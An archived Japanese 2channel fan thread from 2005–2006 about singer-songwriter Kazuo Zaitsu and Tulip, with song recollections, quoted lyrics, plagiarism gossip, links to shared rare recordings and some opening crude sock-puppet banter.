2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

財津和夫を語りませんか。

1 :トンズラー:2005/09/18(日) 20:56:37 ID:zkh2xUmt
往年のヒットメーカーの思い出そして今を語りあいましょう

2 :はつへ:2005/09/18(日) 21:03:48 ID:zkh2xUmt
はじめましてー。私もファンどええぇーす!86年くらいにファンになりました。がんばってーあーあーああああー

3 :おのださん:2005/09/18(日) 21:07:45 ID:zkh2xUmt
うおおおーっ!ええぬぉおー彼のはー!サイコウじゃけんー。ウリャー。とー。えいー!

4 :パイパン軍曹:2005/09/18(日) 21:12:28 ID:zkh2xUmt
わたーしもー!好きでありまーす!!以上でありまーす!撤収ー!

5 :あやややー:2005/09/18(日) 21:15:03 ID:zkh2xUmt
あこがれるわー。濡れてきちゃうー。脇のしたがー

6 :ガンジー:2005/09/18(日) 21:18:43 ID:zkh2xUmt
ふがー。げふっげふっ。天上天下唯我独尊・・・財津さんのための言葉じゃー。。。ちゃーうのーん!?

7 :地下足袋娘:2005/09/18(日) 21:27:59 ID:zkh2xUmt
あかるい掲示板だことー、おほほほほほほぉっ。

8 :トンズラー:2005/09/18(日) 21:33:46 ID:zkh2xUmt
みなさんありがとうございます。どんなところが良いのか具体的に語り合いましょう。トンズラー

9 :はつへ:2005/09/18(日) 21:49:26 ID:zkh2xUmt
すべていいなー

10 :おのださん:2005/09/18(日) 21:50:33 ID:zkh2xUmt
わしもぜーんぶすきじゃあああー

11 :パイパン軍曹:2005/09/18(日) 21:52:18 ID:zkh2xUmt
わたくしもーー!すべてでーっ!ありまああーすうう。退散ー!!

12 :あやややー:2005/09/18(日) 21:53:25 ID:zkh2xUmt
すきすきすきーすべてがー

13 :ガンジー:2005/09/18(日) 21:55:07 ID:zkh2xUmt
わしもっ。。すんべてーすきだぬあーん

14 :地下足袋娘:2005/09/18(日) 21:57:11 ID:zkh2xUmt
つきなみだけど。すき

15 :はるか:2005/09/19(月) 04:13:17 ID:sSfYfhlI


16 :はるか:2005/09/19(月) 12:51:16 ID:sSfYfhlI
財津さんってどんな食物すきなんだろ

17 :玉臭四郎!:2005/09/19(月) 19:29:20 ID:sSfYfhlI
ざるそばが好きっていってたよ。だははー

18 :地下足袋娘:2005/09/19(月) 19:30:47 ID:sSfYfhlI
おほほほほほほぉっ。まぁお詳しいことっ。。。

19 :ガンジー:2005/09/19(月) 19:33:26 ID:sSfYfhlI
わーすも、おーそばっすーきだぬぁーああん!ぬぷぷぷぷー

20 :トンズラー:2005/09/19(月) 19:35:14 ID:sSfYfhlI
あわ、わ、わぁあっ、こっ、ここは在らしの巣だあああああー。ちんげー

21 :おのださん:2005/09/19(月) 19:40:14 ID:sSfYfhlI
そんなことナーイ。そんだけ今は平和なんじゎー。ばかもんがー

22 :パイパン軍曹:2005/09/19(月) 19:44:19 ID:sSfYfhlI
失礼ながらーばかもんとは何でありましょーかー! お国のために馬鹿者になれとおっしゃるのですかー!私にはできませーん!!

23 :玉臭四郎!:2005/09/19(月) 20:00:30 ID:sSfYfhlI
それは聞きずてなりませんなー国民の血税で働くあんたにそんな発言。。

24 :あやややー:2005/09/19(月) 20:05:57 ID:sSfYfhlI
そんな言い方かわいそーよ!お国のために忠誠をつくし働いてる。。そんな彼もしょせんはただの人。そこまでせめないで

25 :パイパン軍曹:2005/09/19(月) 20:09:17 ID:sSfYfhlI
ただの人っ!??・・・ ただの人とは何だーあああ!!愚弄する気かー!ばか女がー

26 :地下足袋娘:2005/09/19(月) 20:11:49 ID:sSfYfhlI
ばか女とはどーゆーことざまーすかー?まだこの国は男尊女卑なのざまーすかー!ふんどし野郎ーっ

27 :おのださん:2005/09/19(月) 20:15:18 ID:sSfYfhlI
ぬぬぬぬぅっ、ふんどしのどこが悪いのじゃーぁ。オナむすめー

28 :はつへ:2005/09/19(月) 20:17:02 ID:sSfYfhlI
今っ、言いましたねー、記録しましたから。オナ娘。やめてよねー!あんたもパイパン?

29 :トンズラー:2005/09/19(月) 20:20:24 ID:sSfYfhlI
みなみなさーん、ここはもう廃止にします。ここまで荒れましたので、あしからず。

30 :トンズラー:2005/09/19(月) 22:57:50 ID:sSfYfhlI
でもやっぱり再開しまーすっ!よろぴくーっ BYトンズラー

31 :NO MUSIC NO NAME:2005/09/23(金) 15:51:47 ID:kykFE+Kv
やっと、財津さんのスレが出来た!!
と言っても、全然僕は、財津さんのことを知らないんですが。
最近気になりはじめて、財津さんからは入らないで、チューリップから入ろうかな
と思ってまーす!!

32 :ともこ:2005/09/27(火) 21:22:46 ID:ew4of9nqO
こんなとこあったんだ。またきまあああすっ。。

33 :NO MUSIC NO NAME:2005/09/28(水) 00:02:40 ID:gjlYfT6z
ここは悲しいインターネットですね。

34 :NO MUSIC NO NAME:2005/10/01(土) 20:48:56 ID:1N+6yjjn


35 :NO MUSIC NO NAME:2005/10/03(月) 00:32:18 ID:ReVLYuEb
オフコースを復活させるにはこの人と山本潤子さんの力が必要だな。
是非頼みます。

36 :NO MUSIC NO NAME:2005/10/06(木) 20:11:10 ID:Sh1fCq47
オフコースは去れ!

37 :NO MUSIC NO NAME:2005/10/07(金) 21:34:44 ID:z475CkEu
どうやったらあんな良いメロディーできるんだろう。作曲ってよくドライブとか散歩中とかよく浮かぶって聞いたけど。。

38 :NO MUSIC NO NAME:2005/10/08(土) 10:44:17 ID:tyJ+ISk2
あんな良いメロディーってどんな曲?

39 :NO MUSIC NO NAME:2005/10/08(土) 18:28:12 ID:IovZvamI
きっとー今ならー
あなたにーあーえーるーだろー

40 :NO MUSIC NO NAME:2005/10/08(土) 19:17:25 ID:Cw/o1AUF
ん?なんてタイトルの曲でしたっけ・・・。

41 :NO MUSIC NO NAME:2005/10/08(土) 19:32:59 ID:IovZvamI
愛の風・・・だっけ?

ELTに本当にそっくりなよく似た曲があるのね
でもZ氏のこの曲を誰も知らないからパクリとは言われないのね。

42 :NO MUSIC NO NAME:2005/10/08(土) 19:52:23 ID:Cw/o1AUF
おぉ!!JACK IS A BOYですね?

マ、マニアックな曲・・・、すっかり忘れてました。


43 :NO MUSIC NO NAME:2005/10/08(土) 20:03:14 ID:IovZvamI
愛の風 (NTV−YTV系 朝の連続ドラマ「花いちばん」主題歌)

マニアック?とんでもない
一応、シングルでタイアップもされとります
でも、誰も知らない・・・

44 :NO MUSIC NO NAME:2005/10/08(土) 20:05:01 ID:Cw/o1AUF

これは恋 ただの恋 夢なんだ あのブルーベルベット

もう二度と 逢えないの 悲しみの海のようなブルー・ヴェルヴェット〜。

   が好き。  マ、マニアック?

45 :NO MUSIC NO NAME:2005/10/08(土) 20:08:02 ID:iBdOQSNk
宮城のエジプトの風はビリージョエル? 僕はライオンなどパクりは多いな(*^_^*)

46 :NO MUSIC NO NAME:2005/10/08(土) 20:11:18 ID:Cw/o1AUF
僕はライオン、昔 人生ゲームの似ている曲コーナーで、
ダリル&ホールだっけ?の曲に似ているというお便りに、
財津氏 気分害してました。

47 :NO MUSIC NO NAME:2005/10/08(土) 20:14:59 ID:IovZvamI
「愛の風」はエブリ・リトル・シングなる雑魚アーティストにバクられたのです

ブルー・ヴェルヴェット イン ブルーは名曲です
でも、誰も知らない・・・

48 :46:2005/10/08(土) 20:25:15 ID:Cw/o1AUF
あれ?ホール&オーツだっけ?ごめんなさい。

49 :NO MUSIC NO NAME:2005/10/08(土) 22:06:39 ID:IovZvamI
意地で曲名調べますた

Every Little Thing の「Face the change」は、
TULIPの「愛の風」のパクリです
良心のある人、是非聞き比べてください!

と言っても「愛の風」を聴く手段がないか・・・
ELTスレにでも殴りこみに行くか

50 :NO MUSIC NO NAME:2005/10/08(土) 22:09:11 ID:Wak7X5Ci
ねぇ ぼくは君の心まで 深く愛せているかい

ねぇ つよく抱くよ心まで だから溶けてしまうと言ってー♪

   も、誰も知りませんよね。

Z氏のソロは『I must be crazy』から『もう一つの愛』『Naked Hert』『愛はちっとも〜』と
結構良い曲が続いたのに、それ以降あまり心に残る曲がう〜〜ん。。。
何かあります?


51 :NO MUSIC NO NAME:2005/10/08(土) 22:13:05 ID:IovZvamI
>>50
NHK「みんなのうた」の為に書き下ろした、
「空飛ぶ魔法のりんご」っていう名曲がありますぜ!

そらとぶまほおのりーんご
ふたりのキスの邪魔をして
フワリ フワリ フワ フワリ
フワリ フワフワ フーワ
風に乗る♪


たぶん、誰も知らない・・・

52 :NO MUSIC NO NAME:2005/10/08(土) 22:13:06 ID:Wak7X5Ci
『Face the change』を知りません。

良心ありますのでいつか聴き比べてみたいと思います。

53 :NO MUSIC NO NAME:2005/10/08(土) 22:16:54 ID:Wak7X5Ci
>>51
知らない。。。。。

あなた かなりマニアックですね。

54 :NO MUSIC NO NAME:2005/10/08(土) 22:20:40 ID:IovZvamI
http://sund1.sakura.ne.jp/uploader/upload.cgi

NO2404
『Face the change』です

>>53
すぐ消しますからダウンロードして聞いてください

55 :NO MUSIC NO NAME:2005/10/08(土) 22:25:48 ID:IovZvamI
http://sund1.sakura.ne.jp/uploader/upload.cgi

NO2405
『愛の風』です
サビのメロディーが同じです

56 :NO MUSIC NO NAME:2005/10/08(土) 22:38:01 ID:IovZvamI
タイトル 空飛ぶ林檎
作詞 松本隆
作曲 財津和夫
編曲 宮川晶
歌手 財津和夫

すでに幻の音源になっているようですね
自分はビデオで録画したのを持ってますが

http://www.interq.or.jp/orange/mitumi/utakan/utafile/35160.htm

57 :NO MUSIC NO NAME:2005/10/08(土) 22:38:51 ID:Wak7X5Ci
>>54
似てる・・・。 

ついでに 2405 のZ氏の曲まで聴いてしまいました。ありがとう。
きっと〜♪ からセリフもメロディーもそっくり。

Z氏 文句言った方がいいですよーーー!!

58 :NO MUSIC NO NAME:2005/10/08(土) 22:48:28 ID:Wak7X5Ci
>>56 
あなた なにもの?

コメントがおかしかったですね。オカルトっぽい曲って・・・。
でも作詞が 松本隆ですからね。

NHKまた放送してくれないかしらね。『切手の無い贈り物』は何回か
放送してくれたような気が・・・。

59 :NO MUSIC NO NAME:2005/10/08(土) 22:51:34 ID:IovZvamI
>>58
何者って言われましても・・・
えーと、オフコースの小田さんファンで、その流れでZ氏の音源も集めてる、と
そんな感じでしょうか(笑)

>>54-55は消しますね

60 :NO MUSIC NO NAME:2005/10/08(土) 22:56:11 ID:Wak7X5Ci
お、お、お、小田さんのファンの方でしたかー。いつもZがお世話になっております。

って私はなにもんだ・・・。

61 :NO MUSIC NO NAME:2005/10/08(土) 23:10:02 ID:Wak7X5Ci
小田さんのファンにしては、Zさんの曲を(誰も知らない曲をまぁ)良くご存知で。

Zさんは小田さんをとっても尊敬してますよね。
お互い競い合って(小田さんはどーかな?)励ましあい??勇気付けられてると思います。
幼馴染のような良いお友達関係ですね。

54-55 ありがとうございました。

62 :NO MUSIC NO NAME:2005/10/09(日) 00:50:00 ID:CQ5+gsCo
ほんの〜 小さな〜 出来心〜♪

63 :NO MUSIC NO NAME:2005/10/09(日) 01:14:19 ID:nszNY0Lr
ほんの〜 小さな〜 できもので〜♪

64 :NO MUSIC NO NAME:2005/10/09(日) 05:26:20 ID:FZs0fbaY
財津さんのつくったーレールの上をー 小田さんが行くのはーたやすいものさー

65 :NO MUSIC NO NAME:2005/10/09(日) 05:30:05 ID:FZs0fbaY
ラブマップショップ、10TH

66 :NO MUSIC NO NAME:2005/10/09(日) 05:43:37 ID:FZs0fbaY
ラブマップショップ、10th odessey、2222年ピクニックの頃 ライブによくいきました、とにかくかっこ良く、僕はあの頃のチューリップが一番いいなぁ。際結成やソロのとき、音量が小さくなってたのが残念だった。キーボード使った曲も少なかったなー

67 :NO MUSIC NO NAME:2005/10/09(日) 09:29:11 ID:ATBGQkPz
財津さんの作ってきた音楽のすばらしさはファンだけでなく業界にまで影響をあたえつづけている。しかしソロになってからバックのミュージシャン、プロデューサーに恵まれてない!

68 :NO MUSIC NO NAME:2005/10/09(日) 09:30:02 ID:qSrZ5Z1F
人生ゲーム、徐々にネット局拡大中!!

69 :NO MUSIC NO NAME:2005/10/09(日) 10:30:26 ID:nMGWoV3o
>>66
ラブマップショップの頃 Z氏弾けてたよね。
今はしっとりとした曲が似合うかなー。
でもライブではロックンロールするとこが カッチョイー!!

音量が小さいのも消化不良だけど、音だし過ぎて割れるのもどーかと、おいミキサー!!

70 :NO MUSIC NO NAME:2005/10/09(日) 23:20:32 ID:Zao52srH
空飛ぶ林檎

こもれびの丘に座って
僕たちは幸せだった
バスケットから赤いリンゴが
空にユラリと飛び立つまでは
編みかけのレンゲの花を投げ出して
君は追うのさ
リンゴは青い小川を越えて 
モンシロチョウとワルツ踊るよ

空飛ぶ魔法の林檎
ふたりのキスの邪魔をして
ふわり ふわり ふわふわり
ふわり ふわふわふわ
風に乗る

71 :NO MUSIC NO NAME:2005/10/09(日) 23:26:20 ID:Zao52srH
>>61さんいらっしゃいます?

「空飛ぶ林檎」をパソに落としたんで、
もしアレでしたら昨日の方法で差し上げますけど・・・
レコード・CD・ビデオ・DVDいずれも未発表で、
今後もリリースの予定は無いはずですからレア度は高いかと

72 :NO MUSIC NO NAME:2005/10/10(月) 06:43:32 ID:BhrGFlzI
携帯でも聞けますか?わたすもほすいー

73 :NO MUSIC NO NAME:2005/10/10(月) 08:16:09 ID:XU7fMOpE
http://www.d1.i-friends.st/index.php?in=fairy

74 :61:2005/10/10(月) 22:56:47 ID:5zOfoJe/
>>71
ホントですか〜?
ありがとうございます。もし今いらっしゃいましたら、12時まではパソ開いて仕事
してます。時々覗きますのでよろしく〜♪
72さんもほしいの?

今日 名古屋のチューリップコンサートに行ってきました。
やっぱ、チューリップはいいわー、思いっきり楽しんで来ましたよ。
Z氏息切らしてました。

75 :71:2005/10/10(月) 23:07:36 ID:IWD0f4Yi
http://sund1.sakura.ne.jp/uploader/upload.cgi

NO2577
『空飛ぶ林檎』

Z氏、チューリップのコアなファンの方じゃないと、
ありがたくもなんともありませんが(笑)

76 :71:2005/10/10(月) 23:25:58 ID:IWD0f4Yi
あとはZ氏関連ですと、こんなのがありますね
希望があればうpします

All Together Now - 1985.06.15 11 I JUST CALL TO SAY I LOVE YOU
(財津和夫・チューリップ・ブレッド&バター・チェッカーズ)

All Together Now - 1985.06.15 20 今だから
(松任谷由実 財津和夫 小田和正 高橋幸宏 後藤次利 高中正義 坂本龍一 加藤和彦)

77 :61:2005/10/10(月) 23:29:23 ID:5zOfoJe/
>>71
頂きました。

Z氏早口言葉の練習した方がよろしいようですね。
ホント コアなファン向けかも。(笑)
パソは音が悪いので、MDに落とします。
どうもご親切に ありがとうございました。



78 :71:2005/10/10(月) 23:35:21 ID:IWD0f4Yi
いや、MDに落としても音悪いかと・・・
これは当時のテレビの放送をビデオで録画したものを、
ラジカセに録音し直して、パソに取り込んだ音ですからね(笑)

75は消しました

79 :61:2005/10/10(月) 23:37:38 ID:5zOfoJe/
>>71
All Together Nowを持ってるんですか?ほー。
『今だから』はもちろん持ってます。

I JUST CALL TO SAY I LOVE YOU はZ氏も歌ったんですね。
スティービーワンダーの曲ですね。ブレバタが歌ってたのは知ってます。
もしよろしかったら、I JUST CALL TO SAY I LOVE YOU だけお願いします。


80 :71:2005/10/10(月) 23:52:00 ID:IWD0f4Yi
http://054.info/

18997
All Together Now - 1985.06.15 11 I JUST CALL TO SAY I LOVE YOU
受信パス 3479

この曲に無理やり日本語の歌詞つけてるんですが、
何か凄く恥ずかしいですね(笑)
歌詞つけたのはZ氏でしょうか・・・

81 :61:2005/10/11(火) 00:05:11 ID:JNEwAtKG
>>71
頂きました。

Z氏はどちらかと言えば、作曲家ですからねえ。
恥ずかしい歌詞なら分かりませんが・・・。(笑)

今日は遅くまでお付き合い頂きましてありがとうございました。
ここのスレ暇そうなので、又遊びにきますね。
おやすみなさーーい。

82 :NO MUSIC NO NAME:2005/10/12(水) 21:11:41 ID:OG5UgiO6
んーネタ無いっすねー

83 :NO MUSIC NO NAME:2005/10/12(水) 22:35:37 ID:OG5UgiO6
もっと しーあーわーせにいーー

84 :NO MUSIC NO NAME:2005/10/12(水) 22:56:21 ID:oO6KZu2z
Z氏詩人だとおもうけどなー。まえテレビでゴルフ場のテーマソングつくってる?とこやってたけど、おもいつきでレコディングしてた。いつもそんな感じなのかなぁ。。すごい

85 :71:2005/10/13(木) 22:26:19 ID:i5CaJ2Kq
Z氏作曲の曲で渡辺典子さんの「花の色」っていう名曲があるのですが、
需要があれば、うpします

「花の色〜うつりにけり〜な〜」って奴ね
でもたぶん、誰も知らないか・・・

86 :NO MUSIC NO NAME:2005/10/14(金) 01:17:05 ID:4wyYs11v
聞きたいでず!!携帯だけど。。どんなのかなぁ。ぜひおねがいしますー

87 :NO MUSIC NO NAME:2005/10/14(金) 15:27:11 ID:SeMr1wn/
花の色

作詞 三浦徳子
作曲 財津和夫

花の色 移りにけりな
悪戯に人を愛してはだめ
初めてあなたに会えた日は心にも止めずに

花の色 移りにけりな
悪戯に人を愛してはだめ
日毎にあなたが憎めない 愛する事を知る

喜びの裏側に悲しみが見える
傷ついて傷つけて離れなくなるの

夕暮れは移りにけりな
気紛れに空を薄暮に染めて
あなたの寝顔に幸せを運ぶのは誰なの

人の世は移りにけりな
気紛れに夢を追いかけてゆく
あなたの見る夢 心から叶うことを祈る

愛しさの裏側に切なさが滲む
傷ついて傷つけて離れなくなるの

88 :NO MUSIC NO NAME:2005/10/16(日) 00:08:12 ID:LFZ0fux7
2ndアルバムあるじゃない?WAKE UP入ってる奴。
あれの裏ジャケットなんだけど光がおもいっきり人の顔浮かび上がらせてますよね?
もろ霊写真なんだけどなんでか騒がれないですよね、ずいぶん昔の話なんで真相ご存知
の方是非ご教授ください。

89 :NO MUSIC NO NAME:2005/10/17(月) 00:04:49 ID:f05l3i2V
さっきテレビ大阪系の新番組「ソロモン流」に出てましたね。

90 :NO MUSIC NO NAME:2005/10/17(月) 22:47:58 ID:7j22JiMp
えーと、ヤフオクの方でジャケット写真ありました、
裏面の右上のライトの光の中で上を向いてる人の横顔がはっきりわかると思います。

ttp://page10.auctions.yahoo.co.jp/jp/auction/m16055167

当時見つけたときはほんとに気持ち悪かったです、皆さんは見つけたときどう感じましたか?
また、当時は騒がれなかったんでしょうか?

91 :NO MUSIC NO NAME:2005/10/18(火) 23:26:56 ID:Ux1UM2Tv
全然しらなかった。あんなさわやかなアルバムなのに信じられません!

92 :NO MUSIC NO NAME:2005/10/18(火) 23:53:12 ID:EvyEww0m
う〜〜ん 私のノートパソでは分かんないなぁ。

93 :NO MUSIC NO NAME:2005/10/22(土) 19:46:19 ID:j+gGcMSi
何の違和感もなく買って聞いていた小学生の俺がいる

94 :NO MUSIC NO NAME:2005/10/22(土) 23:41:20 ID:vsGpU4wn
よくわからないなあ

95 :NO MUSIC NO NAME:2005/10/23(日) 17:47:43 ID:LBxcDmNH
心霊写真じゃないのでは?

何も騒がれなかったと思うけど。Z氏が写ってたとか?

96 :NO MUSIC NO NAME:2005/10/26(水) 21:11:45 ID:bEDPfQmH


97 :NO MUSIC NO NAME:2005/10/29(土) 07:25:19 ID:jt4wCK/y
古いアルバムはcd

98 :NO MUSIC NO NAME:2005/10/29(土) 07:27:21 ID:jt4wCK/y
古いアルバムはcd化して発売しているのかなぁ?詳しい人よろぴく〜

99 :NO MUSIC NO NAME:2005/10/29(土) 17:38:42 ID:/DbIz+w1
>>98
ここ見たら  http://www.toshiba-emi.co.jp/tulip/

100 :NO MUSIC NO NAME:2005/10/29(土) 21:34:52 ID:6iknTn2X
ねぇ?心霊写真の件さ、LPあったから見たけど光のどこかわかんないんだけど。

101 :NO MUSIC NO NAME:2005/10/30(日) 06:48:38 ID:5sTayfp4
99どうもです、が、みえません

102 :NO MUSIC NO NAME:2005/11/06(日) 20:43:53 ID:VraxuBHS
age

103 :NO MUSIC NO NAME:2005/11/07(月) 11:36:59 ID:ZdLZuCdw
ソロの曲は一言でゆうと暗い、地味。

104 :NO MUSIC NO NAME:2005/11/09(水) 07:01:08 ID:nMC0ewZm
月と星の違いじゃない?

105 :NO MUSIC NO NAME:2005/11/09(水) 07:40:37 ID:du895W15
財津ファンですが、たしかに昔ほど凝ったメロディーは聞けなくなってきてる。これこそ財津っつーのがないなー。最近のはシンプルすぎるのが多くて心に残らない!

106 :NO MUSIC NO NAME:2005/11/09(水) 11:51:15 ID:fDhZB+b3
あなたの最近が分からないですが、GOALしちゃってからあまり力入れてないような。

hopeは単調だけど、ちょっとやる気出てたかな?

107 :NO MUSIC NO NAME:2005/11/09(水) 23:08:11 ID:du895W15
rainbows、privatemoonかなりいいかんじがします。それ以前のはくらかった。

108 :NO MUSIC NO NAME:2005/11/11(金) 21:26:59 ID:TCHRznee
財津氏はアルバトロスを最後に才能を『君の住む彼方へ』置いてきてしまいましたね。残念です。
ピクニック以降のアルバムの中で『お〜!いい曲だぁ〜!』と思う曲が…無い!
鈴蘭高原でアトムを見たファンは皆そう感じていると思います。

109 :NO MUSIC NO NAME:2005/11/12(土) 07:07:18 ID:bkkJ0thO
今聞いてもいいなーって思うアルバムはピクニックまで。なんか残念な気がしてならない。ライブも後期の曲中心でやってもらいたい。

110 :NO MUSIC NO NAME:2005/11/13(日) 22:09:21 ID:GTXalPg1
アトムって何ですか?アニメのやつ?

111 :パゴタにいった。:2005/11/16(水) 04:18:46 ID:pFdgB4Bn
40歳男性です。
THE 10th ODYSSEYからのファンです。


112 :NO MUSIC NO NAME:2005/11/16(水) 14:14:16 ID:c0w+cso2
パゴダに行けなかったけど、10th ODYSSEY からのファンです。

(*^-^)/\(^-^*)ナカマ!

113 :NO MUSIC NO NAME:2005/11/23(水) 00:18:13 ID:N66j2k0q
あ〜ぁ。。。終わっちゃたな〜〜〜。。。
今度Z氏に逢えるのはいつなんだろ。。。

114 :NO MUSIC NO NAME:2005/12/02(金) 13:47:42 ID:tuqYKcge
財津さんの曲と声が好きです。
でも昔と比べて声がでなくなっているのががっかりです。
透明感や伸びやかさがない。不摂生では?
年のせいかとも思ったけど、小田さんは今でも変わらないよ。

115 :NO MUSIC NO NAME:2005/12/03(土) 20:10:55 ID:256XxaES
俺にとっては神様的な存在であり、いろんな事を歌とラジオで教えてくれた。そんな財津さんがいつまでも輝いていてほすい。

116 :NO MUSIC NO NAME:2005/12/05(月) 22:28:58 ID:e/pCYqT/
>>114
Zさんは、昔はヘビースモーカーだったけど、今はタバコも止めお酒もひかえ
寒くなってくると、首にマフラーやセーターをぐるぐる巻き、ホテルでは
乾燥しないように暖房切って、床に湿らしたタオルを引いて、寝る時はマスクして寝るらしい。
最近はビールもやめたので、ちょっと喉の調子が良くなってきたような気がする
と言ってた。他にもきっと、もっともっと気を使ってるとは思うけど、
私は努力の人だなーといつも感心してます。
“歳のせい”は、しかたないなぁ。

117 :NO MUSIC NO NAME:2005/12/06(火) 09:06:41 ID:2aNPGk0H
 

118 :NO MUSIC NO NAME:2005/12/08(木) 00:05:20 ID:vRgprqZR
Tulipコンサートツアーが終ってしまい淋しいなぁ
財津さんの生歌聴きたい。
あ〜 切ない・・・

119 :NO MUSIC NO NAME:2005/12/10(土) 14:06:55 ID:lSPFOEoA
財津和夫さんって結婚しているんでしょうか。
質問厨ですみません。

120 :NO MUSIC NO NAME:2005/12/10(土) 21:54:17 ID:GGrmpi2M
>>119
とっくの昔にしてるよ
嫁さんも大変だよな。ベジーな財津の食生活に付き合ってるんだから

121 :NO MUSIC NO NAME:2005/12/12(月) 20:37:15 ID:WVhet7og
ファンのためにいつまでも健康で歌い続けてほしいものです。

122 :NO MUSIC NO NAME:2005/12/14(水) 22:46:23 ID:Onljrm7G
>>120
嫁さんもべジーで太らなくて都合がいいのでは?

123 :NO MUSIC NO NAME:2005/12/16(金) 00:25:38 ID:mzm8xwoA
財津さんって、キリッとしてて目が輝いてる時は、すっごいかっこいい
でもぼーーーっとしてる時は、目が死んでてただのおっさんwwww

さっきWellのビデオ観てて、なんてなんて素敵なんでしょ!!!っと惚れ直しましたぁ。
涙をこらえた姿がこんなに似合う人って・・・
Wellあたりが財津さんの一番いい時だったのかな?
次のコンサートが待ち遠しいーーーー。


124 :NO MUSIC NO NAME:2005/12/16(金) 01:30:07 ID:EIQ+bSeS
ステージ上の財津さんはホントにかっこいい!
昔も今も変わらない!
財津さんLOVE♪

125 :NO MUSIC NO NAME:2005/12/16(金) 20:46:05 ID:SMpp6h15
個人的には白髪染めてほしいす。もうちょい若返ってほすいぬぁーん。財津さんの家族がうらやましい〜いつでも生歌きけるしなー。

126 :NO MUSIC NO NAME:2005/12/16(金) 21:27:25 ID:PjUn1tJn
白髪といえば、昔は小田だったのにな…

127 :NO MUSIC NO NAME:2005/12/16(金) 21:48:35 ID:3hOq1Efx
Z氏って急に老けたよね。
40代の頃は、40代にしては全然若い!!と思ったものでしたが、
少し前にテレビでちらっと見たとき、何だか やつれてしまったような感じで、
老けたなーって感じた。
も少し太ってもいいのでは?

128 :NO MUSIC NO NAME:2005/12/17(土) 01:44:55 ID:QUwuVcdL
財津さんは、お若い頃から
「はやく老人になりたい」とおっしゃってたから
自然体で良いのでは?
コンサートでは凄い元気で57歳とは到底思えないほど
エネルギッシュ!!かっこいい!!



129 :127:2005/12/17(土) 15:27:19 ID:K2H6IXmr
>>128
「はやく老人になりたい」←若い頃から老顔だったからこう言うしかなかったのか?
もう今は老人になりたくないと思ってる、、、でしょうね。
「はやく人間になりたい」と思ってるかも・・・

>>125
私は白髪染めてほしくないな、財津さんらしくないし。
でも武田鉄也は染めてるなぁ。

130 :NO MUSIC NO NAME:2005/12/18(日) 03:53:13 ID:XSgvYHaL
白髪のままでいるって自然体で財津さんらしいね。57歳?あーまだまだ枯れないで!70歳まで現役で、そのあとはラジオのパーソナリティーやテレビのコメンテイターなどやって!

131 :NO MUSIC NO NAME:2005/12/20(火) 12:00:53 ID:QdJDTAT/
そういや、財津の講義受けたやし、2ちゃんねらーでいる?

132 :NO MUSIC NO NAME:2005/12/20(火) 14:41:27 ID:5FdUUxyK
何の講義?おせーて

133 :NO MUSIC NO NAME:2005/12/20(火) 15:11:46 ID:QdJDTAT/
>>132
大阪芸大音楽学科ポピュラー音楽コースの
具体的な講座名は知らないんだけどさ
財津さんそこで教えてるんでしょ?

134 :NO MUSIC NO NAME:2005/12/21(水) 19:45:02 ID:9vSjZ6QL
133 ありがとうございます。そんな活動もしていたんだ。そこで学ぶ生徒は幸せだなー

135 :NO MUSIC NO NAME:2005/12/22(木) 13:39:11 ID:zM3OldU1
償いの日々入ってるアルバム名おしえてー

136 :sage:2005/12/22(木) 13:45:15 ID:63dUmrdr
幸せだなー

137 :NO MUSIC NO NAME:2005/12/22(木) 17:52:10 ID:Ww4uhXXZ
>>135
City Swimmer


138 :NO MUSIC NO NAME:2005/12/22(木) 19:09:00 ID:4KwHqIIN
>>135
邪道かもしれないけど、
おいら、最近 ブック・オフで
250円で「The BEST of Kazuo Zaitsu」(1993.4.21発売、12曲入り)
っていうの買ったら入ってたお〜。
ちなみに、懐メロコーナーに置かれて、たたき売られてた^^;

139 :NO MUSIC NO NAME:2005/12/22(木) 20:04:53 ID:Ww4uhXXZ

邪道だーーーーーーー。

でも私も持ってないCDいっぱいあるから見てこよー。
もう普通では売ってないもんね。ブックオフね。サンキュ♪

140 :NO MUSIC NO NAME:2005/12/25(日) 05:49:43 ID:7oQ2WVQF
ブックオフでよく掘り出し物とかあるもんね。でもチューリップの古いルバムを今CDで発売してるので、それもほしーな

141 :NO MUSIC NO NAME:2005/12/27(火) 13:53:21 ID:5/yQl1jV
財津さんの髪型、ドライヤー持ってってかっこよくブローしたあげたい。

142 :NO MUSIC NO NAME:2005/12/29(木) 12:42:40 ID:St3uvFvo
ただ今NHKFMでオンエア中。

143 :トンズラー:2006/01/02(月) 16:41:03 ID:whToCJQm
みなさん明けましておめでとうございます。本年も財津さんとがんばりましょう。

144 :NO MUSIC NO NAME:2006/01/05(木) 21:27:04 ID:UCB0cty8
いぬ年かー・・・あけおめ!

145 :NO MUSIC NO NAME:2006/01/15(日) 23:03:13 ID:D7NXA+v8


146 :NO MUSIC NO NAME:2006/01/18(水) 11:56:19 ID:3H8l/S/5
14日の人生ゲーム21聴いた〜?
いきなりパンツの話しといて自分は答えない〜!!

何はいてんだろ・・・3枚1000円?、象さんマークのついたやつ?、
それとも体型補正パンツかぁ・・・

147 :NO MUSIC NO NAME:2006/01/23(月) 02:08:02 ID:AOP/fZF9
生財津さんの歌 そろそろ聴けそう・・・・かな?

148 :NO MUSIC NO NAME:2006/01/25(水) 12:44:30 ID:FxAhs9kV
オフィシャルで毎日一時間から3時間散歩してるって、どこまで行っちゃてるんだろ。

きっと次のコンサートに向けてぼーっと考えながら歩いてんだろな。

ちゃんと帰ってきてね〜

149 :NO MUSIC NO NAME:2006/01/28(土) 21:23:03 ID:npekfoQm
散歩の途中サインとか求められないのかなぁ?東京の人はいいなぁ

150 :NO MUSIC NO NAME:2006/01/29(日) 16:43:01 ID:LdXLlQ/k
こんなスレがあったとは!
工房の頃マジで結婚したいと思ってた。人生ゲームでハガキ読まれて喜んだ直後に番組内で結婚報告が...
奥様は確か上智卒の若い方だった。
今やその時の財津氏の年齢を越えてしまった毒女。

151 :NO MUSIC NO NAME:2006/02/02(木) 04:02:52 ID:a7EoVvgf
チェリーブラッサムは名曲だと思う。
松田聖子への提供曲の場合、いつの間にか曲のパターンが同じになってしまった。

152 :NO MUSIC NO NAME:2006/02/02(木) 07:57:05 ID:OPr+XFtS
昨春の福岡の公開放送。
ゲストの姫野氏に財津氏「ホリエモン」と呼んでたよね。
ちょうどニッポン放送との株争奪戦の真っ只中。


153 :NO MUSIC NO NAME:2006/02/02(木) 11:43:29 ID:Rq5HtazD
>>135

償いの日々、なつかしい…。

ピクニック以降はダメという方も
おられるんですね。
私はピクニックからのファンでして。
